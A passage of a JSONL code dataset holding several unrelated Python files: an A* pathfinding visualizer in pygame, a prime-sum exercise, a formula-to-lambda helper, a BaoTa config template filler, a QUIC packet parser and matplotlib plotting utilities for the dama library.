total_rows\n\t\tself.be_updated = True\n\n\tdef get_pos(self):\n\t\treturn self.row, self.col\n\n\tdef is_closed(self):\n\t\treturn self.color == RED\n\n\tdef is_open(self):\n\t\treturn self.color == GREEN\n\n\tdef is_barrier(self):\n\t\treturn self.color == BARRIER\n\n\tdef is_start(self):\n\t\treturn self.color == ORANGE\n\n\tdef is_end(self):\n\t\treturn self.color == TURQUOISE\n\n\tdef reset(self):\n\t\tif self.be_updated:\n\t\t\tself.color = WHITE\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_start(self):\n\t\tif self.be_updated:\n\t\t\tself.color = ORANGE\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_closed(self):\n\t\tif self.be_updated:\n\t\t\tself.color = RED\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_open(self):\n\t\tif self.be_updated:\n\t\t\tself.color = GREEN\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_border(self):\n\t\tself.color = BLACK\n\n\tdef make_barrier(self):\n\t\tif self.be_updated:\n\t\t\tself.color = BARRIER\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_end(self):\n\t\tif self.be_updated:\n\t\t\tself.color = TURQUOISE\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_path(self):\n\t\tif self.be_updated:\n\t\t\tself.color = PURPLE\n\t\t\treturn True\n\t\treturn False\n\n\tdef draw(self, win):\n\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\n\n\tdef update_neighbors(self, grid):\n\t\tself.neighbors = []\n\t\tif self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # DOWN\n\t\t\tself.neighbors.append(grid[self.row + 1][self.col])\n\n\t\tif self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # UP\n\t\t\tself.neighbors.append(grid[self.row - 1][self.col])\n\n\t\tif self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # RIGHT\n\t\t\tself.neighbors.append(grid[self.row][self.col + 1])\n\n\t\tif self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # LEFT\n\t\t\tself.neighbors.append(grid[self.row][self.col - 1])\n\n\tdef __lt__(self, other):\n\t\treturn False\n\n\ndef h(p1, p2):\n\tx1, y1 = p1\n\tx2, y2 = p2\n\treturn abs(x1 - x2) + abs(y1 - y2)\n\n\ndef reconstruct_path(came_from, current, draw):\n\twhile current in came_from:\n\t\tcurrent = came_from[current]\n\t\tcurrent.make_path()\n\t\tdraw()\n\n\ndef algorithm(draw, grid, start, end, start_time):\n\tcount = 0\n\topen_set = PriorityQueue()\n\topen_set.put((0, count, start))\n\tcame_from = {}\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tg_score[start] = 0\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tf_score[start] = h(start.get_pos(), end.get_pos())\n\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\n\t\tfor neighbor in current.neighbors:\n\t\t\tupdate_timer(start_time)\n\t\t\ttemp_g_score = g_score[current] + 1\n\n\t\t\tif temp_g_score < g_score[neighbor]:\n\t\t\t\tcame_from[neighbor] = current\n\t\t\t\tg_score[neighbor] = temp_g_score\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\n\t\t\t\tif neighbor not in open_set_hash:\n\t\t\t\t\tcount += 1\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\t\t\t\tneighbor.make_open()\n\n\t\tdraw()\n\n\t\tif 
current != start:\n\t\t\tcurrent.make_closed()\n\n\treturn False\n\ndef update_timer(start_time):\n\tWIN.fill(BAR, (810, 280, 900, 320))\n\tpassed_time = pygame.time.get_ticks() - start_time\n\tsec = str(passed_time // 1000)\n\tmilisec = str(passed_time / 1000 - passed_time // 1000)\n\tmilisec = milisec[2:4]\n\ttime = sec + \".\" + milisec + \" sec\"\n\tt = font42.render(time, False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = 900, 300\n\tWIN.blit(t, t_rect)\n\ndef reset_timer():\n\tWIN.fill(BAR, (810, 280, 900, 320))\n\n\ttime = \"0.0sec\"\n\tt = font42.render(time, False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = 900, 300\n\tWIN.blit(t, t_rect)\n\ndef make_grid(rows, width):\n\tgrid = []\n\tgap = width // rows\n\tfor i in range(rows):\n\t\tgrid.append([])\n\t\tfor j in range(rows):\n\t\t\tspot = Spot(i, j, gap, rows)\n\t\t\tif i == 0:\n\t\t\t\tspot.make_border()\n\t\t\t\tspot.be_updated = False\n\t\t\telif i == rows - 1:\n\t\t\t\tspot.make_border()\n\t\t\t\tspot.be_updated = False\n\n\t\t\telif j == 0 or j == rows - 1:\n\t\t\t\tspot.make_border()\n\t\t\t\tspot.be_updated = False\n\t\t\tgrid[i].append(spot)\n\n\n\treturn grid\n\n\ndef draw_grid(win, rows, width):\n\tgap = width // rows\n\tfor i in range(rows):\n\t\tpygame.draw.line(win, GREY, (0, i * gap), (width, i * gap))\n\t\tfor j in range(rows):\n\t\t\tpygame.draw.line(win, GREY, (j * gap, 0), (j * gap, width))\n\n\ndef draw(win, grid, rows, width):\n\twin.fill(WHITE, (0, 0, GRID_WIDTH, GRID_WIDTH))\n\n\tfor row in grid:\n\t\tfor node in row:\n\t\t\tnode.draw(win)\n\n\tdraw_grid(win, rows, width)\n\tpygame.display.update()\n\n\ndef get_clicked_pos(pos, rows, width):\n\tgap = width // rows\n\ty, x = pos\n\n\trow = y // gap\n\tcol = x // gap\n\n\treturn row, col\n\n\ndef main(win, width):\n\twin.fill(BAR)\n\tgrid = make_grid(ROWS, width)\n\n\tstart = None\n\tend = None\n\trun = True\n\n\tt = font26.render(\"Python visualization of A* algorithm\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = WIN_WIDTH - 200, 50\n\n\tWIN.blit(t, t_rect)\n\n\tt = font18.render(\"Finding the shortest path from one point to another\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = WIN_WIDTH - 200, 80\n\tWIN.blit(t, t_rect)\n\n\tspot = Spot(0, 0, GRID_WIDTH // ROWS, 0)\n\tspot.x = GRID_WIDTH + 30\n\tspot.y = 120\n\tspot.make_start()\n\tspot.draw(win)\n\n\tt = font18.render(\"- starting point\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 110, 125\n\tWIN.blit(t, t_rect)\n\n\tspot.draw(win)\n\tspot.x = GRID_WIDTH + 30\n\tspot.y = 150\n\tspot.make_end()\n\tspot.draw(win)\n\n\tt = font18.render(\"- ending point\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 110, 155\n\tWIN.blit(t, t_rect)\n\n\tspot.draw(win)\n\tspot.x = GRID_WIDTH + 30\n\tspot.y = 180\n\tspot.make_barrier()\n\tspot.draw(win)\n\n\tt = font18.render(\"- barrier\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 90, 185\n\tWIN.blit(t, t_rect)\n\n\tt = font18.render(\"Press Space to start after putting start,\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 145, 220\n\tWIN.blit(t, t_rect)\n\n\tt = font18.render(\"end and barriers\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 80, 250\n\tWIN.blit(t, t_rect)\n\n\tt = font42.render(\"0.00 sec\", False, 
CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 100, 300\n\tWIN.blit(t, t_rect)\n\n\n\n\twhile run:\n\t\tdraw(win, grid, ROWS, width)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trun = False\n\n\t\t\tif pygame.mouse.get_pressed()[0] and pygame.mouse.get_pos()[0] < GRID_WIDTH and pygame.mouse.get_pos()[1] < GRID_WIDTH: # LEFT\n\t\t\t\tpos = pygame.mouse.get_pos()\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\n\t\t\t\tspot = grid[row][col]\n\t\t\t\tif start is None and spot != end:\n\t\t\t\t\tif spot.make_start():\n\t\t\t\t\t\tstart = spot\n\n\t\t\t\telif end is None and spot != start:\n\t\t\t\t\tif spot.make_end():\n\t\t\t\t\t\tend = spot\n\n\t\t\t\telif spot != end and spot != start:\n\t\t\t\t\tspot.make_barrier()\n\n\t\t\telif pygame.mouse.get_pressed()[2]: # RIGHT\n\t\t\t\tpos = pygame.mouse.get_pos()\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\n\t\t\t\tspot = grid[row][col]\n\t\t\t\tif spot.reset():\n\t\t\t\t\tif spot == start:\n\t\t\t\t\t\tstart = None\n\t\t\t\t\telif spot == end:\n\t\t\t\t\t\tend = None\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_SPACE and start and end:\n\t\t\t\t\tstart_time = pygame.time.get_ticks()\n\t\t\t\t\tfor row in grid:\n\t\t\t\t\t\tfor spot in row:\n\t\t\t\t\t\t\tspot.update_neighbors(grid)\n\n\t\t\t\t\talgorithm(lambda: draw(win, grid, ROWS, width), grid, start, end, start_time)\n\n\n\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\tstart = None\n\t\t\t\t\tend = None\n\t\t\t\t\tgrid = make_grid(ROWS, width)\n\t\t\t\t\treset_timer()\n\n\tpygame.quit()\n\nmain(WIN, GRID_WIDTH)","repo_name":"NikitaPW/Python-A-star-PyGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4221566558","text":"i=1\nx = int(input())\np=[]\np1=[]\ncounter = 0\nwhile True:\n c=0;\n for j in range (1, (i+1), 1):\n a = i%j\n if (a==0):\n c = c+1\n if (c==2):\n p.append(i)\n counter = counter + 1\n if counter >= x:\n break\n i=i+1\nsum=0\nfor i in range(x):\n sum+=p[i]\n p1.append(sum)\nprint(*p1)\n","repo_name":"GuhanSGCIT/SGCIT","sub_path":"prime adder.py","file_name":"prime adder.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4115357432","text":"from lib import *\n\nclass Func:\n def __init__(self, func: str) -> None:\n self.func = func\n self.args = get_args(func)\n self.args_num = len(self.args)\n\n def func_to_python(self) -> None:\n self.lambda_str = fun_to_py(self.func)\n \n def exec_func(self, values: list) -> None:\n if self.lambda_str == None: raise Exception('No lambda string. Call func_to_python before this.')\n values_tuple_str = '('\n for value in values:\n values_tuple_str = values_tuple_str + str(value) + ', '\n values_tuple_str = values_tuple_str + ')'\n self.executable_func = self.lambda_str + values_tuple_str\n self.executable_func = (lambda x: eval_clojure(x))(self.executable_func)\n def get_func_exec(self):\n if self.lambda_str == None: raise Exception('No lambda string. 
Call func_to_python before this.')\n        return eval_clojure(self.lambda_str)\n\n\nif __name__ == '__main__':\n    f: Func = Func('3*x**2 + 5*x - 7')\n    f.func_to_python()\n    fu = f.get_func_exec()\n    print(fu(2))\n","repo_name":"dmitryVonDrake/fun_graph_bot","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"32213701253","text":"import os\nimport time\n\nresults = open(time.strftime('./Results/' + \"%Y-%m-%d-%H_%M_%S-result.txt\", time.localtime()), 'w')\n\ntemples = ''\nmirror_list = []\n\n# 1. read temple\nwith open('temple.txt', 'r', encoding='UTF-8') as file:\n    for i in file.readlines():\n        temples += i\n\n# 2. read mirror\nwith open('mirror.txt', 'r', encoding='UTF-8') as file:\n    for i in file.readlines():\n        item = i.strip('\\n')\n        mirror_list.append(item)\n\nwith open('domains.txt', 'r', encoding='UTF-8') as file:\n    index = 0\n    for i in file.readlines():\n        name = i.strip('\\n')\n        results.writelines('============ config for ' + name + ' start ============')\n        results.writelines('\\n')\n        mirror_config = mirror_list[index].split(':')\n        config = temples.replace('AAA', name)\\\n            .replace('BBB', mirror_config[0])\\\n            .replace('CCC', mirror_config[1])\\\n            .replace('DDD', mirror_config[0])\\\n            + '\\n'\n        results.writelines(config)\n        results.writelines('============ config for ' + name + ' end ============')\n        results.writelines('\\n')\n        results.writelines('\\n')\n        results.writelines('\\n')\n        index = index + 1\n    results.close()\n","repo_name":"Lucifer-23/Spider","sub_path":"Configs/BaoTa/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"41476624718","text":"# built-in modules\nfrom dataclasses import dataclass\nfrom enum import IntEnum\nfrom typing import List, Optional\n\n# implemented modules\nfrom .buffer import (\n    Buffer,\n    int_to_bytes,\n)\nfrom .crypto import (\n    SymmetricContext,\n)\nfrom .frame_parser import (\n    QuicFrameParser,\n    QuicParsedFrame,\n)\nfrom .packet_builder import (\n    PACKET_TYPE_INITIAL,\n    PACKET_TYPE_ZERO_RTT,\n    PACKET_TYPE_HANDSHAKE,\n    PACKET_TYPE_RETRY,\n    PACKET_TYPE_ONE_RTT,\n    PACKET_TYPE_MASK,\n    is_long_header\n)\nfrom .quic_types import (\n    QuicProtocolVersion,\n)\n\n# logging module\nfrom logging import getLogger\nlogger = getLogger(__name__)\n\n\nclass QuicPacketParserState(IntEnum):\n    PARSING_PACKET = 0x01\n    PARSING_PAYLOAD = 0x02\n\n\n@dataclass\nclass QuicParsedPacket:\n    is_long_header: bool\n    packet_type: int\n    dest_cid: bytes\n    payload: bytes\n    frames: List[QuicParsedFrame]\n    src_cid: Optional[bytes] = b\"\"\n    version: Optional[int] = 0\n\n\nclass QuicPacketParser:\n    def __init__(\n        self,\n        symm_context: SymmetricContext\n    ) -> None:\n\n        # todo: add packets parsed with frames\n        self._parsing_state: QuicPacketParserState = QuicPacketParserState.PARSING_PACKET\n\n        # frame parser\n        self._frame_parser = QuicFrameParser()\n\n        # parsed data\n        self._parsed_packets: List[QuicParsedPacket] = []\n\n        # retry\n        self._retry: bool = False\n\n        # symmetric context\n        self._symmetric_context = symm_context\n\n    @property\n    def parsed_packets(self) -> List[QuicParsedPacket]:\n        return self._parsed_packets\n\n    def set_retry(self, value: bool) -> None:\n        self._retry = value\n\n    def reset(self) -> None:\n        # clear parsed packets in list\n        self._parsed_packets = []\n\n    def parse(self, packet: Buffer) -> None:\n\n        # datagram 
parse pseudo\n\n # read first byte\n first_byte: bytes = packet.pull_uint8()\n\n packet_type: int = first_byte & PACKET_TYPE_MASK\n long_header: bool = is_long_header(packet_type)\n logger.debug(\n f\"packet type of {packet_type} is {('short header', 'long header')[long_header]}\")\n\n if packet_type == PACKET_TYPE_INITIAL:\n logger.debug(f\"packet type: INITIAL\")\n elif packet_type == PACKET_TYPE_ZERO_RTT:\n logger.debug(f\"packet type: ZERO RTT\")\n elif packet_type == PACKET_TYPE_HANDSHAKE:\n logger.debug(f\"packet type: HANDSHAKE\")\n elif packet_type == PACKET_TYPE_RETRY:\n logger.debug(f\"packet type: RETRY\")\n elif packet_type == PACKET_TYPE_ONE_RTT:\n logger.debug(f\"packet type: ONE RTT\")\n\n # parse packet number length\n packet_num_length = (packet_type & 0x03) + 1\n logger.debug(f\"packet number length: {packet_num_length}\")\n\n if long_header:\n # parse long header packet\n logger.debug(f\"parsing long header\")\n\n # parse version\n version = packet.pull_uint32()\n logger.debug(f\"version: {int_to_bytes(version).hex(' ', 2)}\")\n logger.debug(f\"version in bytes: {int_to_bytes(version)}\")\n\n # validate version\n if version in (QuicProtocolVersion.NEGOTIATION,\n QuicProtocolVersion.VERSION_1,\n QuicProtocolVersion.SAEM_QUIC):\n logger.debug(f\"version is valid\")\n else:\n logger.debug(f\"version is invalid\")\n\n # parse dest CID\n dest_id_len = packet.pull_uint8()\n logger.debug(f\"dest id len: {dest_id_len}\")\n dest_id = packet.pull_bytes(dest_id_len)\n logger.debug(f\"dest id: {dest_id}\")\n\n # parse src CID\n src_id_len = packet.pull_uint8()\n logger.debug(f\"peer id len: {src_id_len}\")\n src_id = packet.pull_bytes(src_id_len)\n logger.debug(f\"peer id: {src_id}\")\n\n if packet_type == PACKET_TYPE_INITIAL:\n # parse token\n # TODO: implement tokens\n pass\n\n logger.debug(f\"packet peek: {packet.peek(10).hex(' ', 1)}\")\n\n # parse payload length\n\n if packet_type in (PACKET_TYPE_INITIAL, PACKET_TYPE_ZERO_RTT, PACKET_TYPE_HANDSHAKE):\n\n # parse payload\n payload_length = packet.pull_uint_var()\n\n logger.debug(f\"payload length: {payload_length}\")\n # parse packet number\n packet_number = packet.pull_bytes(packet_num_length)\n # packet_number = packet.pull_uint_var()\n logger.debug(f\"packet number: {packet_number}\")\n logger.debug(f\"payload data: {packet.peek(payload_length)}\")\n # parse packet payload\n payload_data = packet.pull_bytes(payload_length)\n logger.debug(f\"payload data: {payload_data}\")\n logger.debug(f\"payload data: {payload_data.hex(' ', 1)}\")\n\n # parse packet payload data\n parsed_frames = self._frame_parser.parse(\n Buffer(data=payload_data))\n\n parsed_packet = QuicParsedPacket(\n is_long_header=long_header,\n packet_type=packet_type,\n version=version,\n dest_cid=dest_id,\n src_cid=src_id,\n payload=payload_data,\n frames=parsed_frames\n )\n\n self._parsed_packets.append(parsed_packet)\n\n else:\n # parse short header packet\n logger.debug(f\"parsing short header\")\n\n # parse dest CID\n dest_id_len = 8\n logger.debug(f\"dest id len: {dest_id_len}\")\n dest_id = packet.pull_bytes(dest_id_len)\n logger.debug(f\"dest id: {dest_id}\")\n\n header_index = packet.tell()\n\n # parse payload\n payload_length = packet.pull_uint_var()\n\n logger.debug(f\"payload length: {payload_length}\")\n # parse packet number\n packet_number = packet.pull_bytes(packet_num_length)\n # packet_number = packet.pull_uint_var()\n logger.debug(f\"packet number: {packet_number}\")\n logger.debug(f\"payload data: {packet.peek(payload_length)}\")\n # parse 
packet payload\n payload_data = packet.pull_bytes(payload_length)\n logger.debug(f\"payload data: {payload_data}\")\n logger.debug(f\"payload data: {payload_data.hex(' ', 1)}\")\n\n dec_payload_data = self._symmetric_context.decrypt(\n payload_data, b\"test_associated\")\n logger.debug(f\"decrypted short header payload: {dec_payload_data}\")\n\n # parse packet payload data\n parsed_frames = self._frame_parser.parse(\n Buffer(data=dec_payload_data))\n\n parsed_packet = QuicParsedPacket(\n is_long_header=long_header,\n packet_type=packet_type,\n dest_cid=dest_id,\n payload=payload_data,\n frames=parsed_frames\n )\n\n self._parsed_packets.append(parsed_packet)\n","repo_name":"eunsaemy/python_quic","sub_path":"quic/packet_parser.py","file_name":"packet_parser.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26853249406","text":"from __future__ import absolute_import\nimport numpy as np\nimport dama as dm\nfrom matplotlib import pyplot as plt\n'''Module to provide plotting convenience functions\nto be used by data source classes\n'''\n\n__license__ = '''Copyright 2019 Philipp Eller\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.'''\n\n# === Modernized ===\n\n\ndef plot_bands(source, var=None, fig=None, ax=None, labels=None, filled=True, lines=False, **kwargs):\n '''\n plot band between the variable's values (expect each bin to have a 1d array)\n\n Parameters:\n -----------\n var : str\n Variable name ot be plotted (if source type is GridArry or GridData with\n a single variable, then that one is used by default)\n \n fig, ax : matplotlib figure and axis (optional)\n\n labels : iterable\n lables to add for the bands\n\n filled : bool\n Draw filled areas between bands\n\n lines : bool\n Draw lines at bands\n '''\n\n #ToDo: fix invalid values\n\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 1\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = np.ma.asarray(source[var])\n\n else:\n data = np.ma.asarray(source)\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n\n cmap = kwargs.pop('cmap', 'Blues')\n cmap = plt.get_cmap(cmap)\n\n n_points = data.shape[1]\n n_bands = (n_points + 1) // 2\n\n if lines:\n linestyles = kwargs.pop('linestyles', ['-']*n_bands)\n linecolors = kwargs.pop('linecolors', ['k']*n_bands)\n\n colors = cmap(np.linspace(0, 1, n_bands + 1))[1:]\n colors = kwargs.pop('colors', colors)\n\n grid_axis = source.grid.axes[0]\n\n for i in range(n_bands):\n upper_idx = n_points - i - 1\n if labels is not None and i < len(labels):\n label = labels[i]\n else:\n label = None\n\n if grid_axis.has_points:\n if not upper_idx == i:\n if filled:\n ax.fill_between(\n grid_axis.points,\n data[:, i],\n data[:, upper_idx],\n color=colors[i],\n label=label,\n **kwargs\n )\n if lines:\n ax.plot(\n grid_axis.points,\n data[:, i],\n color=linecolors[i],\n linestyle=linestyles[i],\n 
label=label,\n **kwargs\n )\n ax.plot(\n grid_axis.points,\n data[:, upper_idx],\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n else:\n if filled:\n ax.plot(\n grid_axis.points,\n data[:, i],\n color=colors[i],\n label=label,\n **kwargs\n )\n if lines:\n ax.plot(\n grid_axis.points,\n data[:, i],\n color=linecolors[i],\n linestyle=linestyles[i],\n label=label,\n **kwargs\n )\n\n else:\n if not upper_idx == i:\n if filled:\n ax.bar(\n grid_axis.edges.edges[:, 0],\n data[:, upper_idx] - data[:, i],\n bottom=np.nan_to_num(data[:, i]),\n width=grid_axis.edges.width,\n color=colors[i],\n align='edge',\n label=label,\n **kwargs\n )\n if lines:\n band_data = np.ma.asarray(data[:, i])\n band_data = np.ma.append(band_data, band_data[-1])\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n label=label,\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n band_data = np.ma.asarray(data[:, upper_idx])\n band_data = np.ma.append(band_data, band_data[-1])\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n else:\n band_data = np.ma.asarray(data[:, i])\n band_data = np.ma.append(band_data, band_data[-1])\n if filled:\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n label=label,\n color=colors[i],\n **kwargs\n )\n if lines:\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n label=label,\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n\n ax.set_xlabel(source.grid.vars[0])\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n ax.set_ylabel(var)\n\n if grid_axis.has_points:\n ax.set_xlim(grid_axis.points.min(), grid_axis.points.max())\n else:\n ax.set_xlim(grid_axis.edges.min(), grid_axis.edges.max())\n\n\ndef plot_map(source, var=None, cbar=False, fig=None, ax=None, **kwargs):\n '''\n plot a 2d color map\n\n Parameters:\n -----------\n\n var : str (optional)\n Variable name ot be plotted (if source type is GridArry or GridData with\n a single variable, then that one is used by default)\n cbar : bool (optional)\n Add colorbar to axis\n fig, ax : matplotlib figure and axis (optional)\n '''\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 2\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = source[var]\n\n else:\n data = source\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n\n data = np.ma.asarray(data)\n\n if data.ndim == source.grid.nax + 1 and data.shape[-1] == 3:\n # plot as image\n pc = ax.imshow(\n data.swapaxes(0, 1)[::-1, :, :],\n extent=(\n source.grid.edges[0].min(), source.grid.edges[0].max(),\n source.grid.edges[1].min(), source.grid.edges[1].max()\n ),\n **kwargs\n )\n else:\n X, Y = source.grid.edge_meshgrid\n pc = ax.pcolormesh(\n X, Y, data.T, linewidth=0, rasterized=True, **kwargs\n )\n if cbar:\n fig.colorbar(pc, ax=ax, label=kwargs.pop('label', var))\n\n ax.set_xlabel(source.grid.vars[0])\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n ax.set_ylabel(source.grid.vars[1])\n if source.grid.axes[1].log:\n ax.set_yscale('log')\n ax.set_xlim(source.grid.edges[0].min(), source.grid.edges[0].max())\n ax.set_ylim(source.grid.edges[1].min(), source.grid.edges[1].max())\n return pc\n\n\ndef plot_step(source, var=None, label=None, fig=None, ax=None, step=None, **kwargs):\n '''\n plot a step function, i.e. 
histogram\n var : str\n Variable name ot be plotted (if source type is GridArry or GridData with\n a single variable, then that one is used by default)\n label : str\n fig, ax : matplotlib figure and axis (optional)\n step : bool, (optional)\n whether to plot as steps or lines\n '''\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 1\n\n if step is None:\n step = source.grid.axes[0].has_edges\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = np.array(source[var])\n\n else:\n data = np.array(source)\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n\n data = np.ma.asarray(data)\n\n if step:\n s = ax.step(\n source.grid.squeezed_edges[0],\n np.ma.append(data, data[-1]),\n where='post',\n label=label,\n **kwargs\n )\n else:\n s = ax.plot(\n source.grid.points[0],\n data,\n label=label,\n **kwargs )\n\n ax.set_xlabel(source.grid.vars[0])\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n ax.set_ylabel(var)\n return s\n\n\ndef plot1d_all(source, *args, **kwargs):\n fig = kwargs.pop('fig', plt.gcf())\n ax = kwargs.pop('ax', plt.gca())\n\n if isinstance(source, dm.PointArray):\n return ax.plot(source)\n\n for var in source.vars:\n ax.plot(source[var], label=var)\n\n\n# --- to be fixed ---\n\n\ndef plot1d(source, x, *args, **kwargs):\n '''1d plot'''\n fig = kwargs.pop('fig', plt.gcf())\n ax = kwargs.pop('ax', plt.gca())\n p = ax.plot(source[x], *args, **kwargs)\n ax.set_ylabel(x)\n return p\n\n\ndef plot(source, *args, labels=None, **kwargs):\n '''2d plot\n \n Parameters:\n -----------\n\n args[0] : str or Iterable (optional)\n data variables to plot \n args[1] : string or Iterable (optional)\n data variables to plot resulting in 2d plots\n labels : string or Iterable (optional)\n \n '''\n\n x = None\n y = None\n if len(args) > 0:\n if isinstance(args[0], str) and args[0] not in source.vars:\n x = None\n y = None\n else:\n x = args[0]\n args = args[1:]\n\n if len(args) > 0:\n if isinstance(args[0], str) and args[0] not in source.vars:\n y = None\n else:\n y = args[0]\n args = args[1:]\n\n fig = kwargs.pop('fig', plt.gcf())\n ax = kwargs.pop('ax', plt.gca())\n\n if x is None and y is None:\n if isinstance(source, dm.PointArray):\n return ax.plot(source, *args, label=labels, **kwargs)\n\n for i, var in enumerate(source.vars):\n if labels is None:\n label = var\n else:\n label = labels[i]\n ax.plot(source[var], *args, label=label, **kwargs)\n\n elif y is None:\n if isinstance(x, str):\n ax.plot(source[x], *args, label=labels, **kwargs)\n ax.set_ylabel(x)\n else:\n for i, x_var in enumerate(x):\n if labels is not None:\n label = labels[i]\n else:\n label = x_var\n ax.plot(source[x_var], *args, label=label, **kwargs)\n\n elif isinstance(x, str):\n if isinstance(y, str):\n p = ax.plot(source[x], source[y], *args, label=labels, **kwargs)\n ax.set_xlabel(x)\n ax.set_ylabel(y)\n return p\n else:\n for i, y_var in enumerate(y):\n if labels is not None:\n label = labels[i]\n else:\n label = None\n ax.plot(source[x], source[y_var], *args, label=label, **kwargs)\n ax.set_xlabel(x)\n else:\n if isinstance(y, str):\n for i, x_var in enumerate(x):\n if labels is not None:\n label = labels[i]\n else:\n label = None\n ax.plot(source[x_var], source[y], *args, label=label, **kwargs)\n ax.set_ylabel(y)\n\n else:\n\n assert len(x) == len(\n y\n ), 'Need same length of x and y variables list'\n\n for i, (x_var, y_var) in enumerate(zip(x, y)):\n if labels is not None:\n label = 
